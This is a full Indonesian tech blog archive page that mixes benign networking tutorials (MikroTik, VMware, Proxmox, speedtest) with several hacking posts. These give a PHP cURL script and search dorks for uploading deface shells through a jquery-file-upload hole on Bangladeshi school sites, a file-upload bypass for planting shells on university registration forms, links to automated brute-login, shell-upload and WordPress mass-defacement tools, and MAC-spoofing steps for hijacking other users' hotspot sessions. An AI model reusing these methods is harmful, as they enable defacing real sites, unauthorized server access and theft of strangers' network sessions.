Jumat, 29 April 2016

Deface website sekolah Bangladesh

hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
POC:

hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

Read more

Kamis, 28 April 2016

Instal VMware Workstation 12 di Ubuntu 14.04 LTS

vmware-workstation 12 pro
Sudah perkenalan dengan Virtualisasi VMware apa belum? Ini mungkin menambah pengetahuan anda... Perkenalan Platform Virtualiasi VMware.

Oke, disini admin ingin share mengenai instalasi VMware Workstation di GNU/Linux Ubuntu 14.04 LTS. Tujuanya membantu teman-teman yang pakai Operating System Linux dan ingin menggunakan VMware Workstation di Linux-nya. 
"Sulit apa tidak instalasi-nya mas?"
"Mudah kok, tinggal ikuti artikel ini insyaallah VMware Workstation anda sukses terinstal."
Selama ini saya menggunakan VMware Workstation di Linux cukup stabil, untuk penggunaan Virtualisasi biasa-nya tidak ada masalah. Saya sering menggunakanya untuk simulator instalasi OS, share knowledge kepada teman-teman, percobaan-percobaan pribadi, dll. Saya memilih platform VMware bukan karena VMware itu yang terpopular didunia Virtualisasi, tetapi karena telah dinyamanin aja sama platform ini. Bagi teman-teman yang ingin meng-explore ilmu VMware, saya merekomendasikan untuk belajar di salah satu Blog VMware Expert Indonesia, yes... "His name is Nathan Gusti Ryan (Owner XP Solution Surabaya)" ini blognya thinkxfree.wordpress.com, tidak hanya artikel tentang VMware, artikel yang lain juga bagus-bagus, anda bakal dihipnotis oleh treatment-treatment "kata-kata" diblog tersebut.

Maaf terlalu panjang muqodimahnya... Hehe
Kembali lagi ke topik yang akan saya share, yaitu instalasi VMware Workstation 12 di Ubuntu 14.04 LTS :

1. Silahkan download dulu aplikasi VMware Workstation 12 terbaru disini.
2. Setelah terdownload silahkan di tambah hak aksesnya.
$ sudo chmod +x VMware-Workstation-Full-12.1.0-3272444.x86_64.bundle
3. Setelah itu eksekusi file-nya untuk melanjutkan ke Instalasi.
$ sudo ./VMware-Workstation-Full-12.1.0-3272444.x86_64.bundle
4. Disini saya mendapatkan error, tetapi tidak terlalu masalah yang penting bisa troubleshooting permasalahanya.
(vmware-installer.py:19962): Gtk-WARNING **: Unable to locate theme engine in module_path: "murrine",
Gtk-Message: Failed to load module "canberra-gtk-module": libcanberra-gtk-module.so: cannot open shared object file: No such file or directory
Jangan dilanjutkan instalasinya, Ctrl+C untuk membatalkan. Baca: Diatas terdapat dua error, (1) "unable to locate theme engine in module_path: "murrine" dan (2) "Failed to load module "canberra-gtk-module". Pada kasus ini yang bisa saya troubleshooting cuma nomor dua, kalo masalah nomor satu itu cuma masalah tidak bisa load theme di modul_path "murrine" tetapi tidak ada masalah sekedar themes. Sebelumnya juga sudah saya cari-cari masalahnya dan sudah saya coba-coba solusi-solusinya tetapi tidak berhasil. Dan masalah tersebut tidak ada kaitanya dengan kinerja, proses-proses saat menjalankan VMware Workstation, jadi tenang aja bro...

Untuk cara troubleshootingya silahkan eksekusi command ini:
sudo ln -s /usr/lib/x86_64-linux-gnu/gtk-2.0/modules/libcanberra-gtk-module.so /usr/lib/libcanberra-gtk-module.so
5. Setelah dieksekusi silahkan lanjutkan instalasi sampai selesai.
6. Semoga bermanfaat... Maaf disini saya tidak jelaskan langkah-langkah instalasinya. Dan itu sebenarnya mudah banget kok... Untuk Serial Number VMware Workstation, dsb silahkan PM aja...
Read more

Minggu, 24 April 2016

Cara Hard Reset Routerboard MikroTik Model hAP Lite | RB 941-2nD-TC

reset rb 941 2nd tc
Pada kesempatan ini saya share lagi seputar MikroTik. Dulu juga sudah pernah posting mengenai Cara Reset Routerboard Mikrotik (Hardware) tetapi metode tersebut tidak mempan saat saya melakukan reset pada RB 941-2nD-TC. 

Nah, itulah latar belakang saya menulis tutorial ini.
Tidak semudah hanya menekan tombol reset aja, tetapi semuanya ada metodenya tersendiri, sekedar memberikan motivasi saja.

Ingat!!!
Jika anda melakukan reset maka anda sudah siap kehilangan konfigurasi anda semuanya, settingan akan kembali ke default configuration . 

Tips!!!
Lupa memang pasti terjadi kalau kita sudah lama tidak menyentuh perangkat tersebut, untuk tipsnya biar nggak lupa adalah sediakan Catatan (note) untuk menyimpan "user" dan "password" login MikroTik anda. Insyaallah jika nanti anda LUPA, anda dapat membuka kembali note yang sudah anda tulis.

Oke, berikut prosedur cara hard-reset nya:
1. Pastikan routerboard dalam keadaan off, atau kabel power tidak terhubung ke routerboard.
2. Pada saat routerboard off, silahkan tekan tombol "res" dengan pena atau kawat kecil (kuat) sampai anda merasakan tombol sudah tertekan atau biasanya berbunyi "tek" dan tahan.
3. Masih dalam kondisi tombol "res" ditekan. Colok adaptor kabel power yang sudah terhubung listrik KE Routerboard.
4. Tunggu beberapa detik, saat lampu ACT-ny berkedip-kedip lepaskan ujung pena/kawat dari tombol "res" (Kabel power masih tercolok).
5. Jika anda melakukan prosedur dengan benar, routerboard seharusnya sudah kembali ke default-configuration. 
Selamat mencoba...

Read more

Cara Mudah dan Cepat SpeedTest di Terminal Linux | Speedtest.net

speedtest
Pada kesempatan kali ini sebenarnya saya iseng aja, karena setiap harinya menggunakan OS GNU/Linux dan sering melakukan test koneksi internet, maka timbul pemikiran "Gimana sich cara mudah dan cepat speedtest di Terminal Linux?" apa commandny? 

Searching sebentar, ketemu caranya. Command speedtest ini sama saat anda melakukan speedtest di situs speedtest.net

Silahkan di copast aja:
$ wget https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py
$ chmod a+rx speedtest_cli.py
$ sudo mv speedtest_cli.py /usr/local/bin/speedtest
$ sudo chown root:root /usr/local/bin/speedtest
Setelah selesai anda dapat leluasa melakukan speedtest tanpa harus membuka browser dan menunggu loading tampilanya. Tinggal ketika aja diterminal:
luxsmart@luxsmart:~$ speedtest
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from PT Telkom Indonesia (36.73.99.16)...
Selecting best server based on latency...
Hosted by CitraNet (Surakarta) [52.45 km]: 31.874 ms
Testing download speed........................................
Download: 3.36 Mbit/s
Testing upload speed..................................................
Upload: 0.62 Mbit/s
Selain anda dapat melihat speedtestnya anda juga dapat melihat IP Public jaringan anda.
Tambahah, jika anda ingin melakukan test speed ke IP Address Server lain, anda harus mengetahui kode server IP Address tersebut. Cara mengetahui kode server-nya anda harus mengeksekusi perintah satu lagi seperti ini:
luxsmart@luxsmart:~$ speedtest --list | more
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
8042) UNY (Yogyakarta, Indonesia) [11.63 km]
7106) GMedia Technologies (Yogyakarta, Indonesia) [11.63 km]
6910) CitraNet (Yogyakarta, Indonesia) [11.63 km]
7301) CitraNet (Surakarta, Indonesia) [52.45 km]
8105) Universitas Negeri Semarang (Semarang, Indonesia) [81.44 km]
7127) GMedia Technologies (Semarang, Indonesia) [81.44 km]
7195) GMedia Technologies (Malang, Indonesia) [251.01 km]
2233) PT. Telekomunikasi Indonesia (Surabaya, Indonesia) [266.06 km]
Perintah diatas itu cara mengetahui kode server speedtest, setelah anda temukan kode server yang ingin anda test speed, cara melakukan test speed ke server tersebut adalah sebagai berikut:

Pertama pilih server tujuan test speed anda. Misal disini saya ingin speedtest ke Orion Cyber Internet di Bandung.
7409) Orion Cyber Internet, PT (Bandung, Indonesia)
Kemudian ketik command dibawah ini:
luxsmart@luxsmart:~$ speedtest --server 7409
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from PT Telkom Indonesia (36.73.99.16)...
Hosted by Orion Cyber Internet, PT (Bandung) [316.45 km]: 726.119 ms
Testing download speed........................................
Download: 2.18 Mbit/s
Testing upload speed..................................................
Upload: 0.60 Mbit/s
Berhasil dech test speednya. Selamat mencoba...

Troubleshoot:
Apabila anda temukan error kode seperti dibawah ini silahkan ulangi command speedtest anda.
luxsmart@luxsmart:~$ speedtest --server 7409
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Traceback (most recent call last):
  File "/usr/local/bin/speedtest", line 796, in <module>
    main()
  File "/usr/local/bin/speedtest", line 790, in main
    speedtest()
  File "/usr/local/bin/speedtest", line 631, in speedtest
    servers = closestServers(config['client'], True)
  File "/usr/local/bin/speedtest", line 436, in closestServers
    serversxml.append(uh.read(10240))
  File "/usr/lib/python2.7/socket.py", line 384, in read
    data = self._sock.recv(left)
  File "/usr/lib/python2.7/httplib.py", line 612, in read
    s = self.fp.read(amt)
  File "/usr/lib/python2.7/socket.py", line 384, in read
    data = self._sock.recv(left)
socket.timeout: timed out
Read more

Cara Deface Dengan PMB Register

Kali ini ane pengen share website Universitas dengan PMB Register
Umumnya setiap website universitas menyediakan tempat pendaftaran online bagi mahasiswa baru.


Oke kita langsung saja..

Dork:
inurl:"pmb."
inurl:"pmb/home/"
inurl:"pmb." intext:"pendaftaran"


1. Klik Pendaftaran Online




2. Akan muncul kolom pendaftaran dan isi semua kolom yang tersedia disitu. Untuk dibagian form upload FOTO ANDA diatas tombol KIRIM DATA  upload shell/uploader yang telah di rename ke bentuk .jpg terlebih dahulu.




3. Aktifkan tamper data klik start lalu klik tombol KIRIM DATA yang ada dibagian bawah sekali.
atau bagi yang menggunakan chrome, bisa menggunakan request maker.



4. klik tamper



5. Rename shell/uploader yang telah di rubah ke bentuk .jpg tadi  dan klik ok jika selesai.



6. selesai klik ok tadi dan akan muncul formulir pendaftaran seperti dibawah dan juga akan muncul link shell/uploader kita tadi seperti gambar dibawah. copy link-nya di bar baru dan paste.




7. inilah hasilnya




beberapa tempat upload shell di berbagai situs:
1. bagian upload foto profil.
2. bagian upload bukti pembayaran/konfirmasi.
3. bagian upload foto ijazah.
4. dll...


sumber:
http://selapancyber.blogspot.co.id/2016/04/cara-deface-website-universitas.html

Read more

Kamis, 21 April 2016

Lokomedia Auto Upload Shell

Okee gann kali ini gua akan share "Lokomedia Auto Upload Shell Backdoor"

Untuk Gunain Tools ini cukup Masukin Target nya saja => ex: http://www.target.com/
Tools ini udah otomatis Brute Login nyaaa, dan kalo berhasil Login nanti langsung auto Upload Shell ^_^


Langsung ajaa gan ini dia Sourcenyaaa => http://pastebin.com/ahBWnc0u

Mikir ada Log nyaa? itu udah Vulgar loh Mzzz Sourcenyaaaa heheheee ^_^

Salam IndoXploit

Read more

Kamis, 14 April 2016

Auto Deface Cms Wordpress melalui link Config

Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.

jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title_2.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:





















kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare

Read more

Senin, 11 April 2016

Cara Upgrade dan Downgrade Versi MikroTik

Istilah Upgrade/Downgrade umumnya adalah sebagai berikut:
Upgrade - (mengganti ke versi yang lebih tinggi)
Downgrade -  (mengganti ke versi yang lebih rendah)
Sudah mengerti kan? Definisi Upgrade/Downgrade itu seperti apa? Nah, sekarang bagaimana kaidahnya kalau kita menerapkan teknik tersebut di MikroTik ?

Teknik tersebut harus memperhatikan kaidah berikut ini:
1. Upgrade baik dilakukan untuk update fitur, fix bugs, dan untuk update versi itu sendiri.
2. Downgrade-lah jika hardware yang digunakan tidak mendukung versi terbaru atau terdapat bug pada versi sekarang.
3. Perhatikan License ketika upgrade ke versi terbaru.
4. Perhatikan kompatibeliatas paket software saat melakukan upgrade / downgrade.

Disini saya akan memberikan contoh cara upgrade-nya, untuk cara downgrade-nya tidak beda jauh dengan cara upgrade. Simak step by step nya...
Cara Upgrade Versi MikroTik hAP Lite RB 941 2nD TC
RB 941
Sebelum kita mulai, saya sudah mengikuti kaidah yang ada diatas, jadi alhamdulillah Routerboard saya kompatibel dengan versi terbaru, license-nya support ke versi 6, untuk bug-nya alhamdulillah tidak ada di versi sebelumnya maupun versi terbaru.

Detail Hardware dan Software Upgrde:
1. RB MikroTik 941 2nD TC
2. Package v6.35rc48
3. Laptop OS (Ubuntu 14.04 64-bit)
Detail IP Address Routerboard Ether1 - Laptop (FTP)
Ether1 : 10.7.1.1/24
Laptop : 10.7.1.2
Oke, berikut langkah-langkahnya:
1. Silahkan didownload dulu versi Paket terbarunya Mikrotik.com.
2. Ektrak file .Zip tadi
3. Upload semua paket tersebut ke File MikroTik.
Connect to Server (Menu pilihan ini terdapat di File Manager - File)
Connect to server
 Isi server Address ftp://10.7.1.1 (FTP ke RB MikroTik) setelah itu Connect.
Connect to ftp server
Connect As, menggunakan username dan password login RB MikroTik. Setelah itu Connect.
Connect to ftp server
Copy semua file .npk (file ektrakan .zip tadi) dan Paste ke RB MikroTik. Bisa dilihat gambar dibawah ini.
upload package
Dibawah ini gambar file .npk tadi yang telah anda upload. Terletak di menu File dalam Winbox MikroTik.
uploaded
 Setelah itu silahkan anda reboot Routerboardnya.
reboot router
 Cek Versi terbaru paket software MikroTik anda pada menu System - Package.
package version
Nah, sekarang MikroTik anda telah updated ke Versi yang terbaru. Untuk cara untuk downgrade-nya sama dengan cara diatas. Bedanya pada download paket software version tadi, silahkan download versi yang dibawahnya, setelah itu anda upload dan reboot. Nanti otomatis MikroTik anda akan ganti ke versi yang lebih rendah.

Semoga bermanfaat.
Read more

Minggu, 10 April 2016

Rabu, 06 April 2016

Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik

CPU (Central Processing Unit) sangat penting perananya pada perangkat yang menggunakan Sistem Operasi. Pada perangkat Mikrotik, CPU sangat berpengaruh pada proses-proses yang dijalankan pada sistem operasi RouterOS. Tinggi rendah nya penggunaan CPU sangat bergantung pada banyak tidaknya proses yang terjadi pada sistem operasi itu sendiri. Penggunaan CPU resource yang tinggi apalagi hingga mendekati 100% terus menerus tentunya akan mengurangi performa dari perangkat Mikrotik itu sendiri.

Jadi disini kita akan bahas cara melihat kenapa kok CPU Usage Mikrotik bisa tinggi mendekati 100% terus. Proses apa yang sebenarnya terjadi di dalam sistem operasi RouterOS nya sehingga menyebabkan CPU usage tinggi. 

Untuk bisa mengetahui penggunaan CPU kita bisa lihat pada winbox di menu System --> Resource. Bisa Anda lihat pada kolom CPU Load.


Nah, sekarang gimana caranya buat mengetahui proses apa aja yang membuat CPU Load Mikrotik nya jadi tinggi? Jawabannya mudah, kita tinggal buka aja menu Tool --> Profile. Untuk Mikrotk dengan CPU Core lebih dari 1, maka kita bisa memilih CPU Core mana yang hendak dilihat proses nya, bisa juga dilihat proses total untuk semua CPU core nya. Berikut tampilan menu profiler nya :


Bisa kita lihat pada gambar di atas ada beberapa proses yang berjalan di Mikrotik, dan kita bisa melihat proses mana yang menyebabkan tingginya beban CPU pada Mikrotik. Proses-proses tersebut diklasifikasikan menjadi beberapa jenis yang disebut Proccess Classifiers. Berikut ini detail Proccess Classifiers dari wiki.mikrotik.com :

  • idle - shows unused CPU. Typically idle=100%-(sum of all process cpu usages).
  • ppp
  • pppoe
  • ppp-compression
  • ppp-mppe
  • ethernet - cpu used by ethernets when sending/receiving packets
  • bridging
  • encrypting - cpu used by packet encryption
  • ipsec - IP security
  • queuing - packet queuing
  • firewall - packet processing in Ip firewall
  • l7-matcher - cpu used by Layer7 matcher.
  • p2p-matcher - Peer-to-peer traffic matcher in ip firewall
  • gre - Gre tunnels
  • eoip - EoIP tunnels
  • m3p - MikroTik Packet Packer Protocol
  • radius
  • ip-pool
  • routing
  • sniffing
  • traffic-accounting
  • traffic-flow
  • console
  • telnet
  • ssh
  • ftp
  • tfpt
  • www
  • dns
  • snmp
  • socks
  • web-proxy
  • winbox
  • metarouter-fs
  • metarouter-net
  • kvm
  • profiling - cpu used by Profiler tool itself
  • btest - bandwidth test tool
  • logging
  • flash - cpu usage when writing to NAND
  • disk - cpu usage when wiring to Disk
  • networking - core packet processing
  • serial
  • usb
  • firewall-mgmt
  • queue-mgmt
  • e-mail
  • fetcher
  • backup
  • graphing
  • health
  • isdn
  • dhcp
  • hotspot
  • radv - IPv6 route advertisement
  • ntp - NTP server/client
  • ldp
  • mpls
  • pim - Multicast routing protocol
  • igmp-proxy
  • bgp
  • ospf
  • rip
  • mme
  • synchronous - cpu usage by synchronous cards
  • gps
  • user-manager
  • wireless
  • dude
  • supout.rif - cpu used by supout.rif file creator.
  • management - RouterOS management processes that do not fall into any other classifier. For example, when routes added to kernel, internal messaging exchange between RouterOS applications, etc.
  • unclassified - any other processes that were not classified.
Dari kasus CPU Load Mikrotik tinggi di atas, proses yang membuat CPU usage tinggi yaitu proses management. Apa itu proses management pada Mikrotik? Kenapa proses management di Mikrotik membuat CPU Load nya tinggi? Untuk menjawab pertanyaan tersebut mari kita bahas dulu apa itu proses management mikrotik.

Menurut wiki.mikrotik.com profile classifier management adalah sebagai berikut :
RouterOS management processes that do not fall into any other classifier. For example, when routes added to kernel, internal messaging exchange between RouterOS applications, etc.
Maksudnya adalah proses manajemen pada RouterOS yang tidak termasuk dalam salah satu dari classifier lainnya. Contohnya, ketika penambahan route pada kernel, pertukaran informasi internal antar aplikasi RouterOS, dll. Yang dimaksud classifier ini adalah proses-proses yang muncul pada menu profile seperti daftar yang disebutkan di atas. Sedangkan pertukaran informasi antar RouterOS bisa berupa SNMP (Simple Network Management Protocol).

Simple Network Management Protocol (SNMP) adalah protokol standar Internet untuk mengelola perangkat pada jaringan. SNMP dapat digunakan untuk berbagai data grafik. Contoh penggunaan nya pada The Dude dan aplikasi sejenisnya  Agar Mikrotik dapat dikelola, maka SNMP harus diaktifkan.

Dari kasus tersebut memang tersangka nya adalah fitur SNMP pada Mikrotik yang menyebabkan CPU Load Mikrotik nya sangat tinggi. Hal ini dikarenakan Router Mikrotik tersebut dimonitor oleh Aplikasi monitoring jaringan yang menggunakan fitur SNMP, seperti The Dude dan SolarWinds.


Setelah saya coba untuk disable fitur SNMP nya pada aplikasi The Dude, CPU Load Mikrotik mulai turun.


Dari gambar di atas bisa dilihat jika proses management turun drastis setelah fitur SNMP pada the dude dimatikan. Disini yang terlihat tinggi yaitu pada proses idle. Dimana proses idle ini merupakan akumulasi dari CPU yang tidak terpakai yakni 97%, karena penggunaan CPU Load nya hanya 3% saja.

Oke, sampai disini kita sudah bahas tentang Cara Mengetahui CPU Usage Proccess yang Tinggi di Mikrotik beserta permasalahan CPU Load tinggi yang disebabkan oleh proses Management di Mikrotik RouterOS. Untuk proses classifier lain nya tidak perlu saya jelaskan, karena sudah ada penjelasan nya.
Read more

Minggu, 03 April 2016

Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id di Windows

Artikel ini merupakan kelanjutan dari artikel yang saya tulis sebelumnya tentang Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id di Linux. Setelah berhasil membahak/hack login hotspot mikrotik & wifi.id di Linux, kali ini saya akan bahas hal serupa pada sistem operasi Windows, yakni Windows 7 x64.

Langkah-langkah hacking wifi.id nya sama seperti sebelumnya, bedanya disini saya pindah spot ke lokasi wifi.id lain dan gunakan OS Windows 7. Tidak seperti pada Kali Linux dimana semua tools sudah tersedia tinggal kita gunakan saja, pada Windows 7 ini untuk tahap scanning wireless client dan mac address nya kita membutuhkan aplikasi tambahan.

Disini saya coba gunakan aplikasi CommView for Wifi. Aplikasi ini sebenarnya berbayar, tapi kita gunakan saja versi evaluation nya biar bisa gratisss :D.

Oke, langsung saja ke langkah-langkah Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id di Windows :

1. Download aplikasi CommView for WiFi disini.
2. Aplikasi ini akan mengnstall driver wifi tersendiri, sehingga pastikan WiFi adapter Anda support. Cek disini ya.
3. Install CommView for WiFi nya --> Buka Aplikasinya --> Nanti kita diminta untuk install driver
4. Setelah proses instalasi selesai, coba lakukan scan. Hasilnya akan muncul seperti gambar berikut :


5. Pilih salah satu target di bawah AP @wifi.id. Copy Mac Address nya.
6. Buka Notepad --> Paste mac address target. Hapus pembatas address nya yang berupa titik dua ':'
7. Copy mac address tadi untuk dijadikan mac address laptop kita.

Cara selengkapnya silakan lihat Video Tutorial Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id di Windows yang sudah saya buat disini :

Cara ini sudah saya coba dan 100% berhasil diterapkan untuk hotspot @wifi.id maupun hotspot Mikrotik. Hanya saja kekurangan nya pada saat user target menyadari kalau internet nya jadi lambat bahkan gak konek sama sekali, dia akan coba re-connect dan re-login. Hal ini akan membuat session kita jadi kacau dan gantian deh jadi gak konek. Jadi ya harus sering-sering lakukan hal yang sama.. hehehe.. :D

Oke selamat mencoba :)
Read more

Sabtu, 02 April 2016

Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id di Linux

Masih tentang bajak-membajak, sebelumnya sudah saya share Cara Membajak Halaman Login Hotspot Mikrotik dimana kita bisa Mengcopy file html, css, js, images, dll yang membentuk halaman login hotspot Mikrotik. Kali ini akan saya share cara untuk membajak session login hotspot Mikrotik orang lain.

Cara Hack Hotspot Mikrotik ini sebenarnya sudah ada sejak lama yang lebih dikenal dengan Mac-Address Spoofing. Jadi inti dari pembajakan atau hack ini adalah sebagai berikut.
  1. Cari Hotspot yang akan dijadikan target pembajakan.
  2. Konek ke hotspot tersebut --> Lakukan scanning mac-address user yang sudah konek dan berhasil login ke hotspot tersebut.
  3. Copy mac-address target.
  4. Ganti mac-address kita dengan mac-address target.
  5. Konek ulang ke hotspot, dan hasilnya kita tidak perlu login untuk menggunakan hotspotnya, karena session dari user target itu sudah kita bajak.
Simpel kan? Kita bisa lakukan hack hotspot Mikrotik ini menggunakan Komputer, Laptop, bahkan Smartphone Android. Khusus buat Android, HP nya harus udah di root dulu ya, karena untuk mengganti mac-address harus jadi superuser. Tapi kali ini kita belum akan bahas pembajakan via smartphone. 

Kita coba dulu pakai Laptop ya, tentunya via WiFi. Disini saya mencoba menggunakan OS Linux. Kenapa Linux? Karena di Windows tidak semua step diatas bisa dilakukan. Kecuali menggunakan Windows versi lama (Win XP - 7) dengan tambahan beberapa software scanning wifi dan manipulasi mac-address. Jadi kali ini saya coba menggunakan Pentest Tool nya Kali Linux.

Kali Linux merupakan salah satu distro Linux yang khusus diciptakan untuk penetration test (Pentest), yang sudah dibekali dengan berbagai macam tools yang bisa kita gunakan untuk melakukan Pentest (hack). Jadi kita akan memanfaatkan tools pentest nya kali linux untuk hack login hotspot wifi.id. Kalau Anda mau gunakan distro Linux lainnya silakan, disini saya contohkan saja menggunakan Kali Linux.

1. Silakan download dulu file image iso kali linux nya disini.
2. Disini kita akan gunakan live cd linux nya, jadi ga perlu install dulu, langsung pakai aja.
3. Burn iso image kali linux nya di CD atau bisa gunakan USB flash disk. Silakan baca disini.
4. Boot ke kali linux nya. Jalankan via live cd.
5. Langkah Hack Hotspot Mikrotik & Wifi.id nya silakan lihat di Tutorial Video yang saya buat ini :



Jadi pada Tutorial video hack hotspot mikrotik & wifi.id tersebut saya mencoba melakukan mac-address spoofing pada salah satu target yang terkoneksi ke Wifi.id. Target nya adalah HP Android saya yang sudah login ke wifi.id. Saya sengaja menargetkan hp saya sendiri supaya tau apa yang terjadi pada target ketika pembajakan ini dilakukan.

Dan hasilnya adalah sebagai berikut :


Karena Mac-address laptop saya sudah diganti dengan mac-address hp android saya, maka ip address yang didapatkan laptop saya juga sama dengan ip address hp saya. Hal ini akan membuat hp saya kehilangan koneksi, karena session nya sudah dibajak oleh laptop saya. Alhasil hp saya kadang bisa konek kadang tidak, begitu juga pada laptop saya yang koneksinya hidup mati, karena terjadi ip conflict. Tapi hal ini hanya terjadi sebentar saja, selanjutnya bisa lancar kok.. hehe

Oke, selamat mencoba Tutorial Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id pada Linux ini.
Implementasi pada Windows bisa baca disini :
Cara Membajak/Hack Login Hotspot Mikrotik & Wifi.id di Windows

Implementasi pada HP Android akan saya bahas dilain waktu.
Read more

Langkah-Langkah Instalasi Proxmox VE

Proxmox adalah salah satu Free platform untuk membangun Virtualisasi Server, baca selengkapnya di Wiki Proxmox. Kali ini saya akan menulis artikel Langkah-Langkah Instalasi Proxmox VE.

Sebelum kita lanjutkan, alangkah baiknya kita cek dulu Hardware (komputer) yang akan kita instal Proxmox VE dengan Requirement dibawah ini:

Minimum Hardware (Hanya untuk tes)
CPU: 64bit (Intel EMT64 or AMD64)
Intel VT/AMD-V capable CPU/Mainboard (for KVM Full Virtualization support)
Minimum 1 GB RAM
Hard drive
One NIC
Recommended Hardware
- Dual or Quad Socket Server (Quad/Six/Hexa Core CPUs´)
- CPU: 64bit (Intel EMT64 or AMD64)
- Intel VT/AMD-V capable CPU/Mainboard (for KVM Full Virtualization support)
- 8 GB RAM is good, more is better (grab as much as possible)
- Hardware RAID with batteries protected write cache (BBU) or flash protection
- Fast hard drives, best results with 15k rpm SAS, Raid10
- Two Gbit NIC (for bonding), additional NIC´s depending on the preferred storage technology and cluster setup
- Fencing hardware (only needed for HA)
Sumber : https://www.proxmox.com/en/proxmox-ve/requirements

Oke, apabila Minimum Hardware Requirement sudah sesuai dengan komputer server anda, dipastikan Proxmox sudah bisa berjalan, tetapi sangat minimum sekali jika digunakan untuk Virtualisasi. Saya sarankan untuk memenuhi Recommended Hardware supaya Proxmox lebih stabil.

Berikut langkah-langkah instalasinya:
1. Siapkan Bootable Proxmox VE.
2. Setting BIOS komputer server anda:
Date and Time
Auto-PowerOn (pilihan)
enable Intel VT/AMD V,
#Pastikan anda telah mengatur urutan First Booting ke USB/DVD-ROM.
#Save
3. Setelah anda setting BIOS dengan benar, kita akan masuk ke Proxmox VE Installation, pilih Install Proxmox VE.
installation proxmox
installation proxmox
4. License Agreement, pilih I Agree.
installation proxmox
5. Pilihan Target Hardisk untuk Proxmox, pilihlah Hardisk mana yang akan anda gunakan sebagai system Proxmox VE. Next
installation proxmox
6. Location and Time Zone, sesuaikan dengan lokasi anda. Next
installation proxmox
7. Pada bagian ini adalah pengisian Password Administrator "root" dan E-mail. Isi password sesuai keinginan anda, dan pastikan format Emailnya benar. Next
installation proxmox
8. Isi FQDN sesuai formatnya. IP Address, Netmask, Gateway, DNS Server menyesuaikan dengan konfigurasi di Router anda. Next
installation proxmox
9. Proses,
installation proxmox
10. Instalasi berhasil, silahkan Reboot.
installation proxmox
Anda dapat Remote Proxmox VE via GUI dengan Browser.
https://192.168.2.10:8006
remote proxmox

Semoga bermanfaat.

Read more